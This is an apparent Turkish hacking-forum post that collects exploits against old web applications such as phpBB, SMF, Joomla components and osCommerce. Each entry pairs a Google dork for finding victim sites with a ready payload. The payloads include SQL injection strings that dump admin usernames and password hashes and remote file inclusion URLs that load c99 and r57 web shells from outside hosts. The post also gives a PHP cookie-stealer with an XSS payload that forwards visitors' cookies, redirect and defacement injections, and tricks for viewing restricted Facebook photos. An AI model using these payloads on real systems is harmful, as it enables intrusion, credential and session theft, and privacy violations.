modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme




OsCommerce SQL Injection Açığı

Google Dork: inurl:"customer_testimonials.php"

Exploit:
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*

Not: Aynı zamanda yönetici değilde bütün üyelerin md5 lerini karşınıza dizer.




Tr ****** News v2.1 Açığı

Google Dork: inurl:news.php?mode=voir

Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*

Admin girişi = /admin

Php-BB 2.0.18 Yönlendirme Açığı

öncelikle php destekli bi hostunuz olmalıdır. Google Free php host yazdığınız zaman bir sürü site çıkar. Şimdi yeni bi not defteri açın ve içine aynen bunları yazın. Ama en ufak bi kodlama hatasında sistem çalışmaz.

Kod:
<?php
$cookie = $_GET[’c’];
$ip = getenv (’REMOTE_ADDR’);
$date=date("j F, Y, g:i a");
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’cookies.txt’, ’a’);
fwrite($fp, ’Cookie: ’.$cookie.’<br> IP: ’ .$ip. ’<br> Date and Time: ’ .$date. ’<br> Referer: ’.$referer.’<br><br><br>’);
fclose($fp);
?>

Bunu farklı kaydet diyip örneğin ismini cookies.php yapalım. Daha sonra ftp den bu dosyayı hostumuza atalım.

Şimdi bir tane daha not defteri açın içine hiçbirşey yazmayın. Onu da php olarak kaydedelim ve ismini örneğin gelencookieler.php yapalım. Bunu da hostumuza atalım. Ama bu boş bıraktığımız gelencookilere.php dosyasına CHMOD ayarı vereceğiz. Sağ tıklayıp CHMOD a gelelim ve 777 ye ayarlayalım yani "okuma" "yazma" ve "çalıştırma" izni vermiş olacaksınız.

Bunu da hallettikten sonra phpbb 2.0.18 kurulu hedef bi site bulalım. Forumlardan birine bi konu açalım veya imzanızada yazabilirsiniz.

Kod:
<pre a=’>’ onmouseover=’********.location="[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]"+********.cookie’ b=’<pre’ >

Bu kodu yazıyoruz. Daha sonra sizin imzanıza yada açtığınız konudaki kodu görenlerin cookiesi gelencookieler.php ye dizilecek.




FullXml Açıgı

1.adım: [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız] a giriyoruz "Fullxml" diye arama yapıyoruz,

2.adım: Seçtiğimiz gözümüze kestirdiğimiz siteye girip sonunua /db/member.xml ekliyoruz.

3.adım: Eğer admin adı ve şifre sorarsa //db/member.xml ekleyerek devam ediyoruz ve orda kullanıcı adları ve şifreler çıkar,

3.adım(2): Eger çıkmaz ise bu site dataları farklı yere saklamıştır. Bu site bu açıkla hacklenemez,

4.adım: Eger girerseniz admin panelinden uploada bastığınız anda dosya upload etmeye geçersınız ordan index'inizi basarsınız.




Bx-cp 0,3 Açığı

Google Dork: "bxcp 0,3"
Karşımıza çıkan sitelerin sonuna şu nu yapıstırmalıyız;

Exploide:
index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0,0,0,0,0,0, 0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=1

Yönetici nick vs hash-ları verir.

Md5 leri kırabilmeniz için sitelerden bazıları;

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]




My-PhpNuke'de Açık

Sistemin kodlanması esnasında galeri modülünde yapılan kodlama hataları, sisteme File Include atakları yapılmasına neden olmaktadır.

Code:
include ("$basepath/imageFunctions.php");

Exploit:
/gallery/displayCategory.php?basepath=http://evil_scripts?




ShotCat Açığı

google araması:

allinurl: "showCat.php?cat_id"

site sonuna eklenecek kod:

showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*

Not: Md5 de kırma istemez,
kullanıcı adları ve pass ları çıkar daha sonra menüde edit kısmı olur.




Com-Cinema Açığı

Aratılacak Kodumuz : allinurl: "com_cinema"

sitenin sonuna eklenecek kod:

index.php?option=com_cinema&Itemid=S@BUN&func=deta il&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(u sername,0x3a,password)/**/from/**/jos_users/*

Googlede arattıkdan sonra karşımıza gelen sayfadan her hyangi bir siteyi seçiyoruz vs sitenin sonuna eklenecek kod-u yapıştırıyoruz. MD5 ler elimizde .




Facebook Güvenlik Açıkları

A-)Avatar Açıkları;
Avatarı büyütme... Örnekle açıklayalım: profile.ak.facebook.com/profile5/605/84/s677609740 _9399.jpg Burada gördüğünüz s harfi small’dan geliyor. Eğer onu silip onun yerine n yani normal yazarsak profile.ak.facebook.com/profile5/605/84/n677609740 _9399.jpg bu resmi büyütüp kaydedebiliyoruz. Sadece bu kadar değil. Bu adresteki profile5/605/84 kısmı kişisel güvenlik kısmıdır ama s677609740 ise kişinin kimliği denilebilecek bir numara, 9399 ise resmin ismidir. Aynı kullanıcının daha önce kullandığı avatarların tek farkı bu 9399 numarası olmasıdır. Bu avatarları Flashget’in batch download (toplu dosya indirme) özelliğini kısmına profile.ak.facebook.com/profile5/605/84/s677609740 _(*).jpg yazarak uzunluk olarak 4 karakterli sayılara karşılık gelen tüm avatarları bilgisayarımıza indirebiliyoruz.

B-)Kısıtlı Profili İzinsiz Açtırma;
Normalde profilleri arkadaşı olmayan kişiler tarafından görülmeyen hesaplar sadece mesaj yollanınca açılıyor. Örneğin adını duymadığınız bir kişi size bir mesaj atıyor; siz de doğal olarak cevaplıyorsunuz. Fakat siz mesajı attığınız anda mesajı attığınız kişi için profiliniz açık hale geliyor. Özellikleri kısıtlamış olsanız bile arkadaşlarınızı, resimlerinizi görebiliyor.

C-)Albüm Fotoğraflarını Görme;
Kısıtlı profilleri açtık ama sadece bir kaç resim mi gözüküyor? Tüm albümü görmek de Facebook açıkları sayesinde problem olmuyor. Facebook kullananlar bilir fotoğraftaki kişileri kutu içine alıp bir şeyler yazılabiliyor. Ama bu büyük bir tehlike. Şifreleme iyi olmadığı için başka kişiler de fotoğraflarınızı görebiliyor.
Örneğin photos-571.11.facebook/photos-11-sf2p/v136/48/92/692548571/n692548571_340324_6962.j pg Bu Facebook’un fotoğraf yükleyen üyelerden birine verdiği bir adres. Sadece bu fotoğraf herkese açık, diğerleri sadece arkadaşlarına açık. Yine buradaki photos-571 üye numarasının son 3 rakamı, en sonraki n692548571_340324_6962.jpg ise resmin şifrelenmiş kısa yoludur.[n= normal, 692548571= üye numarası, 340324=fotoğraf numarası, 6962=güvenlik numarası.]
Fakat burada fotoğraf numarasını bir artırır veya azaltır ve Flashget gibi programların batch download komutunu kullanırsak, bu güvenliği kolayca geçebiliyoruz. Facebook, bir resimden diğerine geçerken genelde önceki sayının 400 fazlasına yakın bir sayı üretiyor. Bu yüzden güvenliği kırmak en fazla 5 dakika sürüyor. Örneğin 340325 diğer yani 1 eksiği olan fotoğraf photos-571.11.facebook.com/photos-11-sf2p/v136/48/92/692548571/n692548571_340325_7760.j pg




Smf 1.1.4 RFI Bug Açığı

Google Dork : Powerd by SMF 1.1.4

Açık 1

/Sources/Subs-Graphics.php?settings[default_theme_dir]=http://jadlex.org/shell/c99.txt?

Açık 2

/Sources/Themes.php?settings[theme_dir]=http://jadlex.org/shell/c99.txt?




Phil-board Açıkları

google arama kodu : Powered by Philboard veya İnurl: philboard_forum.asp

İki şekildede aratabilirsiniz

adminin kullanıcı adı için

philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,1 1,12,13,14,15,16,17,18+from+users

parola için:

philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,1 1,12,13,14,15,16,17,18+from+users

yeni başlayanlar için elverişlidir

Dikkat= İyi bir anti-vir kullanmayanlar. Bazı siteler trojan örneği içermekte. Dikkatli olmanızı tafsiye ederim.




vBulletin Yönlendirme Açığı

vBulletin’de Her Sürümünde Top15 Açığı Bulunmuştur Aslında Bu Açık Çoktan Beri Var, ama Bu zamanda Ortaya Çıkmış. Bir vBulletin Sitesine Giriyorsunuz Forum Anasayfasın da Top15 Varsa işe koyuluyoruz;

Şimdi Yeni Konu Açıyorsunuz,( Nereye Açacağınız Fark Etmiyor)

ve

Konunun Başlıgına

******************* **********="Refresh" *********"0;url=http://www.siteadresi.com"> """" >

Yazmanız yeterli msj bölümüne istediğinizi yazın ...

Eğer açık kapatılmamış ise site yi yönlendirmiş olursunuz.


Bazı Yönlendirmeler;

Resim Çağırma;
<img xsrc=http://www.xxxx.com/resim.jpg>

swf iLe YönLendirme;
<embed xsrc=http://www.xxxx.com/xxxx.swf>

Css Çağırmak;
<link xhref=http://www.xxxx.com/dosya.css type=text/css rel=**********>

Çerçeve (Frame) iLe index;
body topmargin=0 leftmargin=0 onload="********.body.innerHTML='<iframe width=100% height=100% xsrc=http://www.xxxx.com></iframe>';">

StyLe iLe Tam Sayfa Resim Döşemek;
<body><style type=text/css>table, p, td, tr{visibility:hidden;}body {background-color: #000000;background-image: url('http://www.xxxx.com/resim.jpg');}




Advanced Guestbook 2.4.2 Açığı

google dork: Advanced Guestbook 2.4.2 HTML code is enabled

eğer forumun en altında böyle bir yazı varsa= "HTML code is enabled" açık var demektir. Hemen yukardan sign the guestbook sekmesine tıklıyoruz.

Name yerine örnek nick yazıyoruz. Siz nickinizi yazın.

Aşağıya geliYoruz "your message" kısmına yönlendirme kodumuzu yazıyoruz;

<**** **********="Refresh" *********"0;url=http://www.siteadresiniz.com">

Sonra aşağıdaki güvenlik kodunu yazıP submit-e tıkllıyoruz.




Smf açıkları

Vuln:
Simple Machines SMF 1.1 rc2
Simple Machines SMF 1.0.8

Vuln Olmayanlar:
Simple Machines SMF 1.1 rc3
Simple Machines SMF 1.0.9

XSS:
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]"><******>alert('turkhackin ')</******>

-------------------------------

Vuln
SMF 1.0.7 ve aşağısı 1.1rc2 ve aşağısı

Banlanan kullnıcılar ip spoof yapıp tekrar girebiliyor..

------------------------------------

Simple Machines Forum, Version 1.1 RC3
Simple Machines Forum (SMF) ManageBoards.php cur_cat Variable SQL Injection

Sql injection mevcut
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

-----------------------------------
Simple Machines Forum <=1.1RC2 unset() vulnerabilities

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]




Yeni joomla açıkları 3

Google Araması:
inurl:"com_zoom"

Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Site Sonuna:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
inurl:"com_serverstat"

Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=htt p://megaturks.by.ru/c99.txt?

Google Araması:
inurl:"com_fm"

Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
inurl:com_mambelfish

Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.megaturks.com/images/shell.txt?

Google Araması:
inurl:com_lmo

Site Sonuna:
components/com_lmo/lmo.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Bazı joomla açıkları

Google Araması :
inurl:com_mosmedia veya index.php?option=com_mosmedia

Site Sonuna :
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://megaturks.by.ru/r57.txt?

Google Araması :
inurl:com_zoom veya index.php?option=com_zoom

Site Sonuna :
components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
allinurl:com_nfn_addressbook veya inurl:index.php?option=com_nfn_addressbook

Site Sonuna:
components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Site Sonuna2:
administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
inurl:com_moodle

Site Sonuna:
components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.megaturks.com/images/shell.txt?




detail.php?item_id==(SQL) açığı

Exploit in:
detail.php?item_id==(SQL)

Example:
(SQL)=-1%20union+select+1,2,3,concat(user_name,0x3a,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from %20admin/*#




phpBB toplist.php açığı

Google arama

inurl:"toplist.php" "powered by phpbb"

aratıyoruz gelen sitelerin hepsinde deneyin ihtimal war

gelen sitelerde [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız] buradaki toplist.php önemli sitenin dizini değil sadede geçelim buradaki toplist.php nin yerine alttaki kodu ekliyoruz

toplist.php?f=toplist_top10&phpbb_root_path=Shell Adresiniz

ekledikten sonra Return ve o nadide sayfa ( Açık Warsa Tabi )

toplist.php yerine eklenecek kod örneği

toplist.php?f=toplist_top10&phpbb_root_path=http://kobaytm.3000mb.com/c99.txt?